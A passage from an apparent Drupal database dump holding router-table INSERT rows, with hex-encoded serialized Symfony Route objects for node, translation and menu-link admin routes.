745f76617273223b613a303a7b7d733a333a22666974223b693a3132333b733a31343a227061747465726e4f75746c696e65223b733a34363a222f61646d696e2f7374727563747572652f6d656e752f6974656d2f252f656469742f7472616e736c6174696f6e73223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.menu_link_content.delete_form', '/admin/structure/menu/item/{menu_link_content}/delete', '/admin/structure/menu/item/%/delete', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35333a222f61646d696e2f7374727563747572652f6d656e752f6974656d2f7b6d656e755f6c696e6b5f636f6e74656e747d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32343a226d656e755f6c696e6b5f636f6e74656e742e64656c657465223b733a363a225f7469746c65223b733a31363a2244656c657465206d656e75206c696e6b223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32343a226d656e755f6c696e6b5f636f6e74656e742e64656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b613a323a7b733a343a2274797065223b733a32343a22656e746974793a6d656e755f6c696e6b5f636f6e74656e74223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37303a227b5e2f61646d696e2f7374727563747572652f6d656e752f6974656d2f283f503c6d656e755f6c696e6b5f636f6e74656e743e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f7374727563747572652f6d656e752f6974656d223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33353a222f61646d696e2f7374727563747572652f6d656e752f6974656d2f252f64656c657465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.menu_link_content.edit_form', '/admin/structure/menu/item/{menu_link_content}/edit', '/admin/structure/menu/item/%/edit', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35313a222f61646d696e2f7374727563747572652f6d656e752f6974656d2f7b6d656e755f6c696e6b5f636f6e74656e747d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32353a226d656e755f6c696e6b5f636f6e74656e742e64656661756c74223b733a363a225f7469746c65223b733a31343a2245646974206d656e75206c696e6b223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32343a226d656e755f6c696e6b5f636f6e74656e742e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b613a323a7b733a343a2274797065223b733a32343a22656e746974793a6d656e755f6c696e6b5f636f6e74656e74223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36383a227b5e2f61646d696e2f7374727563747572652f6d656e752f6974656d2f283f503c6d656e755f6c696e6b5f636f6e74656e743e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f7374727563747572652f6d656e752f6974656d223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33333a222f61646d696e2f7374727563747572652f6d656e752f6974656d2f252f65646974223b733a383a226e756d5061727473223b693a363b7d7d, 6);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('entity.node.canonical', '/node/{node}', '/node/%', 2, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31323a222f6e6f64652f7b6e6f64657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a34383a225c44727570616c5c6e6f64655c436f6e74726f6c6c65725c4e6f646556696577436f6e74726f6c6c65723a3a76696577223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a225c44727570616c5c6e6f64655c436f6e74726f6c6c65725c4e6f646556696577436f6e74726f6c6c65723a3a7469746c65223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a343a226e6f6465223b733a333a225c642b223b733a31343a225f656e746974795f616363657373223b733a393a226e6f64652e76696577223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a343a226e6f6465223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a6e6f6465223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a226e6f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32363a227b5e2f6e6f64652f283f503c6e6f64653e5c642b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a343a226e6f6465223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f6e6f6465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a226e6f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a323b733a31343a227061747465726e4f75746c696e65223b733a373a222f6e6f64652f25223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('entity.node.content_translation_add', '/node/{node}/translations/add/{source}/{target}', '/node/%/translations/add', 11, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34373a222f6e6f64652f7b6e6f64657d2f7472616e736c6174696f6e732f6164642f7b736f757263657d2f7b7461726765747d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a37323a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a616464223b733a363a22736f75726365223b4e3b733a363a22746172676574223b4e3b733a363a225f7469746c65223b733a333a22416464223b733a31343a22656e746974795f747970655f6964223b733a343a226e6f6465223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a393a226e6f64652e76696577223b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a22637265617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a333a7b733a363a22736f75726365223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a363a22746172676574223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a343a226e6f6465223b613a333a7b733a343a2274797065223b733a31313a22656e746974793a6e6f6465223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a343a226e6f6465223b693a313b733a363a22736f75726365223b693a323b733a363a22746172676574223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39343a227b5e2f6e6f64652f283f503c6e6f64653e5b5e2f5d2b2b292f7472616e736c6174696f6e732f616464283f3a2f283f503c736f757263653e5b5e2f5d2b2b29283f3a2f283f503c7461726765743e5b5e2f5d2b2b29293f293f247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22746172676574223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22736f75726365223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31373a222f7472616e736c6174696f6e732f616464223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a226e6f6465223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f6e6f6465223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a343a226e6f6465223b693a313b733a363a22736f75726365223b693a323b733a363a22746172676574223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31313b733a31343a227061747465726e4f75746c696e65223b733a32343a222f6e6f64652f252f7472616e736c6174696f6e732f616464223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.node.content_translation_delete', '/node/{node}/translations/delete/{language}', '/node/%/translations/delete', 11, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34333a222f6e6f64652f7b6e6f64657d2f7472616e736c6174696f6e732f64656c6574652f7b6c616e67756167657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f666f726d223b733a33333a226e6f64652e636f6e74656e745f7472616e736c6174696f6e5f64656c6574696f6e223b733a383a226c616e6775616765223b4e3b733a363a225f7469746c65223b733a363a2244656c657465223b733a31343a22656e746974795f747970655f6964223b733a343a226e6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a2264656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a383a226c616e6775616765223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a343a226e6f6465223b613a333a7b733a343a2274797065223b733a31313a22656e746974793a6e6f6465223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a343a226e6f6465223b693a313b733a383a226c616e6775616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37353a227b5e2f6e6f64652f283f503c6e6f64653e5b5e2f5d2b2b292f7472616e736c6174696f6e732f64656c657465283f3a2f283f503c6c616e67756167653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e6775616765223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f7472616e736c6174696f6e732f64656c657465223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a226e6f6465223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f6e6f6465223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a343a226e6f6465223b693a313b733a383a226c616e6775616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31313b733a31343a227061747465726e4f75746c696e65223b733a32373a222f6e6f64652f252f7472616e736c6174696f6e732f64656c657465223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.node.content_translation_edit', '/node/{node}/translations/edit/{language}', '/node/%/translations/edit', 11, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34313a222f6e6f64652f7b6e6f64657d2f7472616e736c6174696f6e732f656469742f7b6c616e67756167657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a37333a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a65646974223b733a383a226c616e6775616765223b4e3b733a363a225f7469746c65223b733a343a2245646974223b733a31343a22656e746974795f747970655f6964223b733a343a226e6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a22757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a383a226c616e6775616765223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a343a226e6f6465223b613a333a7b733a343a2274797065223b733a31313a22656e746974793a6e6f6465223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a343a226e6f6465223b693a313b733a383a226c616e6775616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37333a227b5e2f6e6f64652f283f503c6e6f64653e5b5e2f5d2b2b292f7472616e736c6174696f6e732f65646974283f3a2f283f503c6c616e67756167653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e6775616765223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31383a222f7472616e736c6174696f6e732f65646974223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a226e6f6465223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f6e6f6465223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a343a226e6f6465223b693a313b733a383a226c616e6775616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31313b733a31343a227061747465726e4f75746c696e65223b733a32353a222f6e6f64652f252f7472616e736c6174696f6e732f65646974223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.node.content_translation_overview', '/node/{node}/translations', '/node/%/translations', 5, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32353a222f6e6f64652f7b6e6f64657d2f7472616e736c6174696f6e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37373a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a6f76657276696577223b733a31343a22656e746974795f747970655f6964223b733a343a226e6f6465223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a393a226e6f64652e76696577223b733a33363a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6f76657276696577223b733a343a226e6f6465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a343a226e6f6465223b613a333a7b733a343a2274797065223b733a31313a22656e746974793a6e6f6465223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a33353a22636f6e74656e745f7472616e736c6174696f6e2e6f766572766965775f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a226e6f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34323a227b5e2f6e6f64652f283f503c6e6f64653e5b5e2f5d2b2b292f7472616e736c6174696f6e73247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f7472616e736c6174696f6e73223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a226e6f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f6e6f6465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a226e6f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a353b733a31343a227061747465726e4f75746c696e65223b733a32303a222f6e6f64652f252f7472616e736c6174696f6e73223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.node.delete_form', '/node/{node}/delete', '/node/%/delete', 5, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31393a222f6e6f64652f7b6e6f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31313a226e6f64652e64656c657465223b733a363a225f7469746c65223b733a363a2244656c657465223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a343a226e6f6465223b733a333a225c642b223b733a31343a225f656e746974795f616363657373223b733a31313a226e6f64652e64656c657465223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a32313a225f6e6f64655f6f7065726174696f6e5f726f757465223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a343a226e6f6465223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a6e6f6465223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a226e6f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33333a227b5e2f6e6f64652f283f503c6e6f64653e5c642b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a343a226e6f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f6e6f6465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a226e6f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a353b733a31343a227061747465726e4f75746c696e65223b733a31343a222f6e6f64652f252f64656c657465223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.node.delete_multiple_form', '/admin/content/node/delete', '/admin/content/node/delete', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32363a222f61646d696e2f636f6e74656e742f6e6f64652f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33323a225c44727570616c5c6e6f64655c466f726d5c44656c6574654d756c7469706c65223b733a31343a22656e746974795f747970655f6964223b733a343a226e6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33303a225f656e746974795f64656c6574655f6d756c7469706c655f616363657373223b733a343a226e6f6465223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33353a226163636573735f636865636b2e656e746974795f64656c6574655f6d756c7469706c65223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33333a227b5e2f61646d696e2f636f6e74656e742f6e6f64652f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f636f6e74656e742f6e6f64652f64656c657465223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32363a222f61646d696e2f636f6e74656e742f6e6f64652f64656c657465223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.node.edit_form', '/node/{node}/edit', '/node/%/edit', 5, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31373a222f6e6f64652f7b6e6f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31323a225f656e746974795f666f726d223b733a393a226e6f64652e65646974223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31313a226e6f64652e757064617465223b733a343a226e6f6465223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a32313a225f6e6f64655f6f7065726174696f6e5f726f757465223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a343a226e6f6465223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a6e6f6465223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a226e6f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33313a227b5e2f6e6f64652f283f503c6e6f64653e5c642b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a